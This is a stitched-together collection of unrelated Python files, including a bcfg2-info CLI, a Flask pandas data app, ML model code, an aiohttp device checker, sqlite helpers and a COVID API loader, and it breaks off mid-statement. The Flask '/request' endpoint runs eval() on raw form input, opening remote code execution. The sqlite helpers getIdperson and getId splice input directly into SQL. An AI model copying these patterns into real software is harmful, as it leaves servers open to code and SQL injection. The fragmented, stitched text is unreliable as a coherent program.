                # appears in several structures
                times.setdefault(entry.get("name"),
                                 self.profile_entry(entry, metadata,
                                                    runs=runs))
        return times
    def profile_client(self, metadata, templates=None, runs=5):
        """ Profile all structures for a given client """
        structs = self.core.GetStructures(metadata)
        struct_count = 0
        times = dict()
        for struct in structs:
            struct_count += 1
            self.logger.info("Rendering templates from structure %s:%s "
                             "(%s/%s)" %
                             (struct.tag, struct.get("name"), struct_count,
                              len(structs)))
            times.update(self.profile_struct(struct, metadata,
                                             templates=templates, runs=runs))
        return times
    def stdev(self, nums):
        """ Calculate the standard deviation of a list of numbers """
        mean = float(sum(nums)) / len(nums)
        return math.sqrt(sum((n - mean) ** 2 for n in nums) / float(len(nums)))
    def run(self, setup):
        clients = self.get_client_list(setup.clients)
        times = dict()
        client_count = 0
        for client in clients:
            client_count += 1
            self.logger.info("Rendering templates for client %s (%s/%s)" %
                             (client, client_count, len(clients)))
            times.update(self.profile_client(self.core.build_metadata(client),
                                             templates=setup.templates,
                                             runs=setup.runs))
        # print out per-file results
        tmpltimes = []
        for tmpl, ptimes in times.items():
            try:
                mean = float(sum(ptimes)) / len(ptimes)
            except ZeroDivisionError:
                continue
            ptimes.sort()
            # was len(ptimes) / 2: true division yields a float on
            # Python 3 and raises TypeError when used as a list index
            median = ptimes[len(ptimes) // 2]
            std = self.stdev(ptimes)
            if mean > 0.01 or median > 0.01 or std > 1 or setup.templates:
                tmpltimes.append((tmpl, mean, median, std))
        print("%-50s %-9s %-11s %6s" %
              ("Template", "Mean Time", "Median Time", "σ"))
        for info in reversed(sorted(tmpltimes, key=operator.itemgetter(1))):
            print("%-50s %9.02f %11.02f %6.02f" % info)
if HAS_PROFILE:
    class Profile(InfoCmd):
        """ Profile a single bcfg2-info command """
        options = [Bcfg2.Options.PositionalArgument("command"),
                   Bcfg2.Options.PositionalArgument("args", nargs="*")]
        def run(self, setup):
            prof = profile.Profile()
            # look up the subcommand class and invoke it under the
            # profiler with its arguments re-quoted into one string
            cls = self.core.commands[setup.command]
            prof.runcall(cls, " ".join(pipes.quote(a) for a in setup.args))
            display_trace(prof)
class InfoCore(Bcfg2.Server.Core.Core):
    """Main class for bcfg2-info."""
    def __init__(self, cli):
        Bcfg2.Server.Core.Core.__init__(self)
        # back-reference to the CLI that owns this core (used by Shell)
        self.cli = cli
    def get_locals(self):
        """ Expose the local variables of the core to subcommands that
        need to reference them (i.e., the interactive interpreter) """
        # NOTE(review): locals() here contains only {'self': self}; the
        # interpreter therefore gets the core as `self` -- presumably
        # intentional, but worth confirming
        return locals()
    def run(self):
        # load plugins, then serve filesystem events until interrupted
        self.load_plugins()
        self.block_for_fam_events(handle_events=True)
    def _run(self):
        # the threaded server entry points of the base class are not
        # used by bcfg2-info; run()/shutdown() drive everything directly
        pass
    def _block(self):
        pass
    def shutdown(self):
        Bcfg2.Server.Core.Core.shutdown(self)
class CLI(cmd.Cmd, Bcfg2.Options.CommandRegistry):
    """ The bcfg2-info CLI """
    options = [Bcfg2.Options.BooleanOption("-p", "--profile", help="Profile")]
    def __init__(self):
        cmd.Cmd.__init__(self)
        Bcfg2.Options.CommandRegistry.__init__(self)
        self.prompt = 'bcfg2-info> '
        # register every InfoCmd subclass defined in this module
        self.register_commands(globals().values(), parent=InfoCmd)
        parser = Bcfg2.Options.get_parser(
            description="Inspect a running Bcfg2 server",
            components=[self, InfoCore])
        parser.add_options(self.subcommand_options)
        parser.parse()
        if Bcfg2.Options.setup.profile and HAS_PROFILE:
            # profile core startup itself; was prof.runcall(InfoCore)
            # without the required `cli` argument (TypeError) -- pass
            # self, matching the InfoCore(self) call below
            prof = profile.Profile()
            self.core = prof.runcall(InfoCore, self)
            display_trace(prof)
        else:
            if Bcfg2.Options.setup.profile:
                print("Profiling functionality not available.")
            self.core = InfoCore(self)
        # give every registered subcommand a handle on the server core
        for command in self.commands.values():
            command.core = self.core
    def run(self):
        """ Run bcfg2-info """
        try:
            if Bcfg2.Options.setup.subcommand != 'help':
                self.core.run()
            return self.runcommand()
        finally:
            self.shutdown()
    def shutdown(self):
        Bcfg2.Options.CommandRegistry.shutdown(self)
        self.core.shutdown()
    def get_names(self):
        """ Overwrite cmd.Cmd.get_names to use the instance to get the
        methods and not the class, because the CommandRegistry
        dynamically adds methods for the registed subcommands. """
        return dir(self)
    def onecmd(self, line):
        """ Overwrite cmd.Cmd.onecmd to catch all exceptions (except
        SystemExit) print an error message and continue cmdloop. """
        try:
            cmd.Cmd.onecmd(self, line)
        except SystemExit:
            raise
        except:  # pylint: disable=W0702
            exc_type, exc_value, exc_traceback = sys.exc_info()
            lines = traceback.format_exception(exc_type, exc_value,
                                               exc_traceback)
            self.stdout.write(''.join(lines))
|
from flask import Flask, render_template, request, json
import numpy as np
import pandas as pd
MyApp = Flask(__name__)
df = pd.read_csv('static/data/master_ho_v2.csv');
def getUni(df, fed, col):
    """Return per-department values of `col` as a ['department', 'result'] frame.

    fed == 'all' aggregates over every federation (mean for the per-capita
    columns, sum otherwise); any other value filters rows to that fedecode.
    """
    mean_cols = ['ndip_n', 'nent_n', 'nequ_n']
    if fed == 'all':
        grouped = df[['department', col]].groupby('department')
        agg = grouped.mean() if col in mean_cols else grouped.sum()
        return agg.reset_index().rename(columns={col: 'result'})
    subset = df.query('fedecode==' + str(fed))[['department', col]]
    subset = subset.copy(deep=True).reset_index(drop=True)
    return subset.rename(columns={col: 'result'})
def test_df(df, department):
    # Return the `region` of the first row whose department equals the
    # given department (accepts department as str or int).
    return df[df.department == int(department)].head(1).region.values[0]
def getRatio(df, fed, cols):
    """Return cols[0]/cols[1] as a percentage per department.

    fed == 'all' sums both columns per department first; otherwise the
    ratio is computed row-wise over the rows of that fedecode.
    """
    if fed == 'all':
        # (a dead copy of the unaggregated columns was removed here)
        temp = df[['department'] + cols].groupby('department').sum().reset_index()
        temp['result'] = temp[cols[0]] / temp[cols[1]] * 100
        return temp.reset_index(drop=True)[['department', 'result']]
    else:
        ndf = df.query('fedecode==' + str(fed))[['department'] + cols].copy(deep=True)
        # was ndf[cols[0]] / df[cols[1]]: dividing by the *unfiltered*
        # frame's column only worked by accident of index alignment
        ndf['result'] = ndf[cols[0]] / ndf[cols[1]] * 100
        return ndf[['department', 'result']]
def getCorr(df, cols):
    """Return the per-department Pearson correlation of cols[0] vs cols[1]."""
    # the grouped corr() yields a (department, level_1) multi-index;
    # keep only the cols[0]-vs-cols[1] cell of each department's matrix
    pair = df.groupby('department')[cols].corr()[cols[0]].reset_index()
    pair = pair.query('level_1==\'' + cols[1] + '\'').reset_index()
    return pair[['department', cols[0]]].rename(columns={cols[0]: 'result'})
def to_dict(df):
    """Convert a ['department'|'fed', ..., 'result'] DataFrame to a
    JSON-style dict string keyed by the id column."""
    if 'department' in df.columns:
        tmp = df.set_index('department').to_dict()['result']
    elif 'fed' in df.columns:
        tmp = df.set_index(df.columns[0]).to_dict()['result']
    else:
        # previously fell through with `tmp` unbound (NameError)
        raise ValueError("expected a 'department' or 'fed' column")
    # was tmp.iteritems(): Python 2 only; items() works on both versions
    return str({str(k): v for k, v in tmp.items()}).replace("'", '"')
def getDf(df, var1, metric, fed=None, var2=None):
    """Dispatch to the aggregation matching *metric*.

    'uni' -> getUni, 'ratio' -> getRatio, 'corr' -> getCorr; any other
    metric yields None.
    """
    if metric == 'uni':
        result = getUni(df, fed, var1)
    elif metric == 'ratio':
        result = getRatio(df, fed, [var1, var2])
    elif metric == 'corr':
        result = getCorr(df, [var1, var2])
    else:
        result = None
    return result
@MyApp.route('/')
def home():
    """Render the landing page."""
    page_title = 'Home'
    return render_template('index.html', title=page_title)
@MyApp.route('/request', methods=['POST', 'GET'])
def request__():
    """AJAX endpoint: compute the requested aggregation and return it as JSON.

    Expects form fields 'var1', 'var2', 'method' and 'fede'; as a side
    effect the result frame is dumped to static/data/tempfile.csv.
    """
    # SECURITY: eval() on raw form input executes arbitrary client-supplied
    # Python. Presumably the client sends quoted strings — replace with
    # explicit parsing/validation instead of eval.
    var1 =str(eval(request.form['var1']))
    var2 =str(eval(request.form['var2']))
    method =str(eval(request.form['method']))
    fede =str(eval(request.form['fede']))
    df_temp = getDf(df, var1, method, fed=fede, var2=var2)
    df_temp.index.name = 'id'
    df_temp.to_csv("static/data/tempfile.csv")
    json_file = df_temp.to_json(orient='records')
    return json.dumps({'status':'OK','answer':'response', 'var1':var1, 'var2':var2, 'method':method, 'fede':fede, 'data':json_file})
if __name__ == "__main__":
    # Development entry point; debug=True must not be used in production.
    MyApp.run(debug=True)
|
import matplotlib.pyplot as plt
import numpy as np
def plot2d(rays, sli='xz'):
    """Plot ray paths projected onto a 2D slice ('xz', 'zx' or 'xy').

    Each element of *rays* is a sequence of ray segments; the segment start
    points (p0) are chained along a new third axis and the final end point
    (p1) is appended when present.
    """
    def plot_ray(ray):
        ra = np.concatenate([np.atleast_3d(ri.p0) for ri in ray], 2)
        # 'not p1 == None' raises on numpy arrays (elementwise comparison);
        # an identity test is the correct presence check
        if ray[-1].p1 is not None:
            ra = np.concatenate([ra, np.atleast_3d(ray[-1].p1)], 2)
        if sli == 'xz':
            plt.plot(ra[:, 2, :].squeeze().T, ra[:, 0, :].squeeze().T, c=ray[0].color)
        elif sli == 'zx':
            plt.plot(ra[:, 0, :].squeeze().T, ra[:, 2, :].squeeze().T, c=ray[0].color)
        elif sli == 'xy':
            plt.plot(ra[:, 1, :].squeeze().T, ra[:, 0, :].squeeze().T, c=ray[0].color)
    for ray in rays:
        plot_ray(ray)
def plot_system2d(sys, sli='xz'):
    """Draw every surface of the optical system *sys* on the chosen 2D slice.

    *sli* selects which projection of each surface is plotted ('xz', 'zx',
    'xy' or 'yx'). NOTE(review): an unrecognised *sli* leaves plot_surf
    undefined and the loop below raises NameError.
    """
    if sli == 'xz':
        def plot_surf(s):
            sf = s.surface(proj='y')
            plt.plot(sf[2], sf[0], 'k')
    if sli == 'zx':
        def plot_surf(s):
            sf = s.surface(proj='y')
            plt.plot(sf[0], sf[2], 'k')
    if sli == 'xy':
        def plot_surf(s):
            sf = s.surface(proj='z')
            plt.plot(sf[1], sf[0], 'k')
    if sli == 'yx':
        def plot_surf(s):
            sf = s.surface(proj='z')
            plt.plot(sf[0], sf[1], 'k')
    for s in sys:
        plot_surf(s)
def dotplt(rays):
    """Spot diagram of the last ray bundle plus a diffraction-limit circle.

    Assumes rays[-1].d[0] is the reference (chief) ray direction and the
    remaining directions span the numerical aperture — TODO confirm against
    the ray type's conventions.
    """
    # NA from the largest angle between the reference direction and the rest
    NA = max([np.sin(np.arccos(np.dot(rays[-1].d[0], d_i))) for d_i in rays[-1].d[1:]])
    #print(rays[-1].d[0])
    #print([np.sin(np.arccos(np.dot(rays[-1].d[0], d_i))) for d_i in rays[-1].d[1:]])
    #print(rays[-1])
    #print(NA)
    # build an orthonormal basis transverse to the reference direction
    xh = np.cross(rays[-1].d[0], rays[-1].d[1])
    yh = np.cross(xh, rays[-1].d[0])
    xh = xh/np.linalg.norm(xh)
    yh = yh/np.linalg.norm(yh)
    # diffraction-limited radius; the 1e-6 factor presumably converts the
    # wavelength's unit into the scene's length unit — verify
    r_dl = rays[-1].wavelength * 1e-6 / (2 * NA)
    pts = rays[-1].p0 #np.array([r_i[-1].p0 for r_i in rays])
    # project the spot positions onto the transverse basis, centred on the mean
    x1 = (pts*xh[None,:]).sum(1)
    y1 = (pts * yh[None, :]).sum(1)
    plt.plot(x1 -x1.mean(), y1 - y1.mean(), '.')
    t = np.linspace(0, 2 * np.pi)
    plt.plot(r_dl * np.sin(t), r_dl * np.cos(t))
    plt.axis('equal')
    #xlim(-.06, .06)
    plt.ylim(-r_dl*3, r_dl*3)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Apr 4, 2020
.. codeauthor: svitlana vakulenko
<svitlana.vakulenko@gmail.com>
Transformer for sequence classification with a message-passing layer
'''
import gc
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.modeling_distilbert import DistilBertPreTrainedModel, DistilBertModel
class MPLayer(nn.Module):
    """Message-passing layer: spreads predicate scores over a KG subgraph."""
    def __init__(self):
        super(MPLayer, self).__init__()
    def forward(self, p_scores, subgraph):
        '''
        Inputs:
            *p_scores*: predicate scores from the Transformer, one per relation
            *subgraph*: tuple (indices, relation_mask, entities) — sparse edge
                        indices, per-edge relation ids, initial entity activations
        Outputs:
            *y*: answer activations, one per entity
            *num_entities*: number of entities in the subgraph
        '''
        # build subgraph adjacencies into a tensor
        indices, relation_mask, entities = subgraph
        num_entities = len(entities)
        num_relations = p_scores.shape[0]
        # subgraph = torch.sparse.FloatTensor(indices=indices, values=torch.ones(indices.size(1), dtype=torch.float).cuda(),
        #                                     size=(num_entities, num_entities*num_relations))
        # propagate score from the Transformer: each edge picks up the score
        # of its relation
        p_scores = p_scores.gather(0, relation_mask)
        subgraph = torch.sparse.FloatTensor(indices=indices, values=p_scores,
                                            size=(num_entities, num_entities*num_relations))
        # _subgraph = torch.sparse.mm(p_scores, subgraph)
        # MP step: propagates entity activations to the adjacent nodes
        y = torch.sparse.mm(subgraph.t(), entities)
        # and MP to entities summing over all relations
        y = y.view(num_relations, num_entities).sum(dim=0) # new dim for the relations
        # print(y.shape)
        del p_scores, subgraph, indices, relation_mask
        return y, num_entities
class MessagePassingBert(DistilBertPreTrainedModel):
    r"""
        **labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``:
            Labels for computing the sequence classification/regression loss.
            Indices should be in ``[0, ..., config.num_labels - 1]``.
            If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
            If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
    Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
        **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
            Classification (or regression if config.num_labels==1) loss.
        **logits**: ``torch.FloatTensor`` of shape ``(batch_size, config.num_labels)``
            Classification (or regression if config.num_labels==1) scores (before SoftMax).
        **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
            list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
            of shape ``(batch_size, sequence_length, hidden_size)``:
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        **attentions**: (`optional`, returned when ``config.output_attentions=True``)
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
    Examples::
        tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
        model = BertForSequenceClassification.from_pretrained('bert-base-uncased')
        input_ids = ...
        labels = torch.tensor([1]).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids, labels=labels)
        loss, logits = outputs[:2]
    """  # noqa: ignore flake8"
    def __init__(self, config):
        super(MessagePassingBert, self).__init__(config)
        # DistilBert encoder followed by a predicate classifier
        self.bert = DistilBertModel(config)
        # self.dropout = nn.Dropout(0.1)
        self.classifier = nn.Linear(config.hidden_size, self.config.num_labels)
        # the predicted score is then propagated via a message-passing layer
        self.mp = MPLayer()
        self.init_weights()
    def forward(
        self,
        input_ids=None,
        subgraph=None,
        attention_mask=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
    ):
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask
        )
        # Complains if input_embeds is kept
        hidden_state = outputs[0]
        # [CLS]-position vector acts as the pooled sequence representation
        pooled_output = hidden_state[:, 0]
        # pooled_output = self.dropout(pooled_output)
        predicate_logits = self.classifier(pooled_output)
        # MP layer takes predicate scores and propagates them to the adjacent entities
        logits, num_entities = self.mp(predicate_logits.view(-1), subgraph)
        del subgraph
        outputs = (logits,)# + outputs[2:] # add hidden states and attention if they are here
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(logits.view(-1, num_entities), labels.view(-1))
            outputs = (loss,) + outputs
            del logits
        gc.collect()
        torch.cuda.empty_cache()
        return outputs  # (loss), logits, (hidden_states), (attentions)
"""web_access.py"""
import aiohttp
import asyncio
import logging
from typing import List
from itertools import islice
from devices import Device
# Module-wide logger and event loop used by the connection checks below.
logger = logging.getLogger('itl_mismatch_detector')
loop = asyncio.get_event_loop()
async def test_web_access(registered_devices: List[Device], max_parallel_connections: int = 30) -> List[Device]:
    """
    Verify the list of registered devices to check whether the web access is enabled or not.

    :param registered_devices: the list of registered devices to test with
    :param max_parallel_connections: the number of connections to establish in parallel
    :return: the devices, each with its web_access flag set
    """
    registered_devices_after_checks = []
    # the async context manager guarantees the session is released; the
    # original called session.close() without awaiting it (a no-op that
    # leaked the connector)
    async with aiohttp.ClientSession() as session:
        test_connection_tasks = (is_web_enabled(session, device) for device in registered_devices)
        while True:
            # take the next batch of at most max_parallel_connections checks
            batch = list(islice(test_connection_tasks, max_parallel_connections))
            if not batch:
                break
            # wrap coroutines in tasks explicitly: passing bare coroutines to
            # asyncio.wait is deprecated, as is the loop= argument
            done, _pending = await asyncio.wait([asyncio.ensure_future(coro) for coro in batch])
            for task in done:
                registered_devices_after_checks.append(task.result())
    return registered_devices_after_checks
async def is_web_enabled(session:aiohttp.ClientSession, device:Device) -> Device:
    """
    Attempt the connection to device web access to confirm that it's enabled or not.

    Sets device.web_access to True only on an HTTP 200; timeouts, connection
    errors and any other status mark it False.
    :param session: active ClientSession
    :param device: device to use for test
    """
    logger.info('Testing device: %s %s', device.name, device.ip_address)
    # NOTE(review): duplicates the log line on stdout; drop once logging is configured
    print(f'Testing device: {device.name} {device.ip_address}')
    try:
        async with session.get(f'http://{device.ip_address}', timeout=5) as resp:
            if resp.status == 200:
                device.web_access = True
                return device
    except asyncio.TimeoutError:
        device.web_access = False
        return device
    except (aiohttp.ClientConnectionError,
            aiohttp.ServerDisconnectedError,
            aiohttp.ClientError):
        device.web_access = False
        return device
    # reached when the response status was not 200
    device.web_access = False
    return device
rock = '''
_______
---' ____)
(_____)
(_____)
(____)
---.__(___)
'''
paper = '''
_______
---' ____)____
______)
_______)
_______)
---.__________)
'''
scissors = '''
_______
---' ____)____
______)
__________)
(____)
---.__(___)
'''
# The three possible moves; index 0=rock, 1=paper, 2=scissors.
moves= [rock,paper,scissors]
userMove = input("What do you choose?\n0 for Rock, 1 for Paper & 2 for Scissors.\n")
import random
# Computer picks one of the ASCII-art strings at random.
compMove = random.choice(moves)
# Compare the user's numeric choice against the computer's art string.
if userMove == "0":
    print(f"{rock}\nComputer chose:")
    if compMove == rock:
        print(f"{rock}\nTied!")
    elif compMove == paper:
        print(f"{paper}\nYou Lost!")
    else:
        print(f"{scissors}\nYou Won!")
elif userMove == "1":
    print(f"{paper}\nComputer chose:")
    if compMove == rock:
        print(f"{rock}\nYou Won!")
    elif compMove == paper:
        print(f"{paper}\nTied!")
    else:
        print(f"{scissors}\nYou Lost!")
elif userMove == "2":
    print(f"{scissors}\nComputer chose:")
    if compMove == rock:
        print(f"{rock}\nYou Lost!")
    elif compMove == paper:
        print(f"{paper}\nYou Won!")
    else:
        print(f"{scissors}\nTied!")
else:
    print("Your move isn't available. Please choose between 0 to 2 inclusive")
#or
# game_images = [rock, paper, scissors]
# user_choice = int(input("What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\n"))
# print(game_images[user_choice])
# computer_choice = random.randint(0, 2)
# print("Computer chose:")
# print(game_images[computer_choice])
# if user_choice >= 3 or user_choice < 0:
# print("You typed an invalid number, you lose!")
# elif user_choice == 0 and computer_choice == 2:
# print("You win!")
# elif computer_choice == 0 and user_choice == 2:
# print("You lose")
# elif computer_choice > user_choice:
# print("You lose")
# elif user_choice > computer_choice:
# print("You win!")
# elif computer_choice == user_choice:
# print("It's a draw")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sqlite3
def getAllRecord(table,c):
    """Return a cursor over every row of *table*, highest id first.

    NOTE(review): the table name is interpolated into the SQL text, so it
    must never come from untrusted input.
    """
    query = "select * from " + table + " order by id desc"
    return c.execute(query)
def getRecord(table,idt,c):
    """Return a cursor selecting the row of *table* whose id equals *idt*.

    The id is passed as a bound parameter — the original interpolated it
    into the SQL string, which allowed SQL injection. The table name cannot
    be bound and must still come from trusted code.
    """
    rq = "select * from " + table + " where id = ?"
    return c.execute(rq, (str(idt),))
def createNewRecord(table,param,c):
    """Insert *param* (column -> value mapping) into *table*.

    Values are bound as parameters instead of quoted into the SQL text (the
    original concatenation allowed SQL injection and broke on values
    containing quotes). Column and table names cannot be bound and must
    still be trusted. Each value is stored as str(value), matching the
    original behaviour.
    """
    columns = list(param.keys())
    placeholders = ", ".join("?" for _ in columns)
    rq = "INSERT INTO " + table + " (" + ",".join(columns) + ") VALUES (" + placeholders + ")"
    return c.execute(rq, tuple(str(val) for val in param.values()))
def updateFieldRecord(table,param,idt,c):
    """Update the row of *table* with id *idt*, setting each column in *param*.

    Values and the id are bound as parameters — the original built the whole
    statement by string concatenation, allowing SQL injection. Table and
    column names cannot be bound and must come from trusted code. Values are
    stored as str(value), matching the original behaviour.
    """
    columns = list(param.keys())
    assignments = ", ".join(col + " = ?" for col in columns)
    rq = "update " + table + " set " + assignments + " where id = ?"
    values = [str(val) for val in param.values()] + [str(idt)]
    return c.execute(rq, values)
def deleteRecord(table,idt,c):
    """Delete the row of *table* whose id equals *idt*.

    The id is bound as a parameter (the original interpolated it into the
    SQL, allowing injection); the table name must still be trusted.
    """
    rq = "delete from " + table + " where id = ?"
    return c.execute(rq, (str(idt),))
def getIdperson(table,entry,c):
    """Return the first id whose name or function matches *entry*, else 0.

    *entry* is expected to arrive already quoted (e.g. "'bob'") because it
    is spliced directly into the SQL — an injection risk kept only for
    backward compatibility with existing callers; prefer bound parameters.
    """
    # the original had no space before "or", producing "...<entry>or function..."
    rq = "select id from " + table + " where name = " + entry + " or function= " + entry
    c.execute(rq)
    idt = c.fetchone()
    if idt is not None:
        return idt
    return 0
def getId(table,entry,c):
    """Return the first id whose name equals *entry* (pre-quoted), else 0.

    NOTE(review): *entry* is spliced into the SQL text, so it must be trusted.
    """
    lookup = "select id from " + table + " where name = " + entry
    row = c.execute(lookup).fetchone()
    return row if row is not None else 0
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the decentNumber function below.
def decentNumber(n):
    """Print the largest n-digit 'decent' number, or -1 if none exists.

    A decent number uses only the digits 5 and 3; the count of 5s must be
    divisible by 3 and the count of 3s by 5. Larger numbers have 5s first.
    """
    fives = n
    # trade five 5s for five 3s until the remaining 5-count divides by 3
    while fives % 3 != 0:
        fives -= 5
        if fives < 0:
            print(-1)
            return
    print('5' * fives + '3' * (n - fives))
if __name__ == '__main__':
    # Read the number of test cases, then one digit-count per case.
    t = int(input().strip())
    for t_itr in range(t):
        n = int(input().strip())
        decentNumber(n)
|
from ztag.annotation import *
class FoxBrand(Annotation):
    """Annotate Fox/Niagara device-id scans with manufacturer and device type."""
    port = 1911
    protocol = protocols.FOX
    subprotocol = protocols.FOX.DEVICE_ID
    # Mapping from the brand id reported by the device to
    # (manufacturer, device type).
    _vendors = {
        "vykon": (Manufacturer.VYKON, Type.SCADA_CONTROLLER),
        "facexp": (Manufacturer.FACEXP, Type.SCADA_CONTROLLER),
        "websopen": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
        "webs": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
        "distech": (Manufacturer.DISTECH, Type.SCADA_CONTROLLER),
        "centraline": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
        "staefa": (Manufacturer.SIEMENS, Type.SCADA_CONTROLLER),
        "tac": (Manufacturer.SCHNEIDER, Type.SCADA_CONTROLLER),
        "webeasy": (Manufacturer.WEBEASY, Type.SCADA_CONTROLLER),
        "alerton": (Manufacturer.ALERTON, Type.HVAC),
        "nexrev": (Manufacturer.NEXREV, Type.HVAC),
        "comfortpoint": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
        "novar.opus": (Manufacturer.NOVAR, Type.HVAC),
        "trend": (Manufacturer.TREND, Type.SCADA_CONTROLLER),
        "tridium": (Manufacturer.TRIDIUM, Type.SCADA_CONTROLLER),
        "bactalk": (Manufacturer.ALERTON, Type.SCADA_CONTROLLER),
        "webvision": (Manufacturer.HONEYWELL, Type.HVAC),
        "trane": (Manufacturer.TRANE, Type.HVAC),
        "integra": (Manufacturer.INTEGRA, Type.CINEMA),
        "wattstopper": (Manufacturer.WATTSTOPPER, Type.LIGHT_CONTROLLER),
        "vyko": (Manufacturer.VYKON, Type.SCADA_CONTROLLER),
        "eiq": (Manufacturer.EIQ, Type.SOLAR_PANEL),
        "thinksimple": (Manufacturer.THINK_SIMPLE, Type.SCADA_CONTROLLER),
    }
    # Expected annotations per raw brand id, used by the framework's tests.
    tests = {
        "vykon": {
            "global_metadata": {
                "manufacturer": Manufacturer.VYKON,
                "device_type": Type.SCADA_CONTROLLER,
            },
        },
        "wattstopper": {
            "global_metadata": {
                "manufacturer": Manufacturer.WATTSTOPPER,
                "device_type": Type.LIGHT_CONTROLLER,
            },
        },
        "thinksimple": {
            "global_metadata": {
                "manufacturer": Manufacturer.THINK_SIMPLE,
                "device_type": Type.SCADA_CONTROLLER,
            },
        },
    }
    def process(self, obj, meta):
        """Fill meta with manufacturer/type for the scanned brand id.

        NOTE(review): an unknown brand raises KeyError — presumably the
        annotation framework treats that as "no annotation"; confirm.
        """
        vendor = obj["brand_id"].lower().strip()
        m, dt = self._vendors[vendor]
        meta.global_metadata.manufacturer = m
        meta.global_metadata.device_type = dt
        return meta
|
import sys
from utils import *
import tensorflow as tf
# NOTE(review): the original line `tf.InteractiveSession` (no parentheses)
# was a no-op attribute access and has been removed.
for x in range(1, len(sys.argv)):
    arg = sys.argv[x]
    features, labels = readFromCSV(arg)
    print(features["Home Score"].shape)
# Define a and b as placeholders (TF1 graph-mode API)
a = tf.placeholder(dtype=tf.int32)
b = tf.placeholder(dtype=tf.int32)
# Define the addition
c = tf.add(a, b)
# Initialize the graph
graph = tf.Session()
# Run the graph: feed the first game's two scores into the add op
sumOfScores = graph.run(c, feed_dict={a: features["Home Score"][0], b: features["Visitor Score"][0]})
# Python 2 print statement is a syntax error under Python 3; use the function
print("This is the sum of the first game's scores: " + str(sumOfScores))
|
import click
import pokeit
import checkit
import settings
import sys
@click.command()
@click.option('-uq', help='unique part of @id uri')
@click.option('-s', help='success criteria file')
@click.argument('template', type=click.File('rb'))
def main(uq, s, template):
    """Simple DLCS pipeline tester"""
    # run the poke step first; only verify the manifest when it succeeded
    exit_code, manifest = pokeit.pokeit(uq, s, template)
    if exit_code == 0:
        manifest_url = settings.PRESLEY_BASE + f"/customer/manifest?manifest_id={manifest}"
        exit_code = checkit.checkit(manifest_url)
    sys.exit(exit_code)
if __name__ == '__main__':
    # CLI entry point.
    main()
|
#enmaneul hernandez
#movie trailer website
#part of code are from udacity learning material
import webbrowser
#class that make the blueprint for movie objects
class Movie():
    """Store the metadata of a single movie and open its trailer on demand."""
    # Allowed MPAA ratings.
    VALID_RATINGS = ["G", "PG", "PG-13", "R"]
    def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):
        """Remember the title, storyline, poster URL and trailer URL."""
        self.title = movie_title
        self.storyline = movie_storyline
        self.poster_image_url = poster_image
        self.trailer_youtube_url = trailer_youtube
    def show_trailer(self):
        """Open this movie's trailer in the default web browser."""
        webbrowser.open(self.trailer_youtube_url)
|
from .abstract_request import AbstractRequest, AbstractRequestCodec
class RequestGetDetails(AbstractRequest):
    """Request asking a device for its details; carries no payload."""
    # Protocol opcode identifying this request type on the wire.
    opcode = 0x22
    def __init__(self):
        pass
class RequestGetDetailsCodec(AbstractRequestCodec):
    """Wire codec for RequestGetDetails (the request body is always empty)."""
    @staticmethod
    def encode(request):
        """Serialise the request; there is nothing to encode."""
        return b''
    @staticmethod
    def decode(payload):
        """Deserialise a request; the payload is ignored."""
        return RequestGetDetails()
|
# Truncate (or create) the SQL script that will receive the INSERT statements.
path = 'scripts/increment_data_load.sql'
try:
    open(path, 'w').close()
except IOError:
    print('Failure')
import requests
# COVID stringency data for the first seven months of 2021.
url = "https://covidtrackerapi.bsg.ox.ac.uk/api/v2/stringency/date-range/2021-01-01/2021-08-01"
response = requests.get(url, headers={'Accept':'application/json'})
data = response.json()
# Only the first day's per-country snapshot is loaded.
data1 = data['data']['2021-01-01']
def output_api():
    """Build one INSERT statement per country from the 2021-01-01 snapshot.

    NOTE(review): values are spliced into the SQL text unescaped; acceptable
    only while the upstream API data is trusted.
    """
    statements = ''
    for _, record in data1.items():
        statements += (
            'INSERT INTO epam (country_code, date_value, confirmed, deaths, stringency_actual, stringency) VALUES ('
            + "'" + record['country_code'] + "'" + ', '
            + "'" + record['date_value'] + "'" + ", "
            + "'" + str(record['confirmed']) + "'" + ", "
            + "'" + str(record['deaths']) + "'" + ", "
            + "'" + str(record['stringency_actual']) + "'" + ", "
            + "'" + str(record['stringency']) + "'" + '); '
        )
    return statements
# Persist the generated INSERT statements for the loader below.
with open('scripts/increment_data_load.sql', 'w') as f:
    f.write(output_api())
from flask import Flask, render_template
import authentications as au, psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import sys
app = Flask(__name__)
# Path of the SQL used to display results, and the table header shown in the UI.
show_result = 'scripts/select_query.sql'
t1 = ('country_code', 'date_value', 'confirmed', 'deaths', 'stringency_actual', 'stringency')
query = 'scripts/increment_data_load.sql'
def read_file():
    """Return the contents of the increment-load SQL script.

    NOTE(review): a second read_file() defined further down shadows this
    one; this version is only used by the import-time load immediately below.
    """
    with open(query, 'r') as r1:
        return r1.read()
# Run the increment load once at import time.
# conn must exist before the try: if connect() raises, the original hit a
# NameError on 'conn' inside the finally block.
conn = None
try:
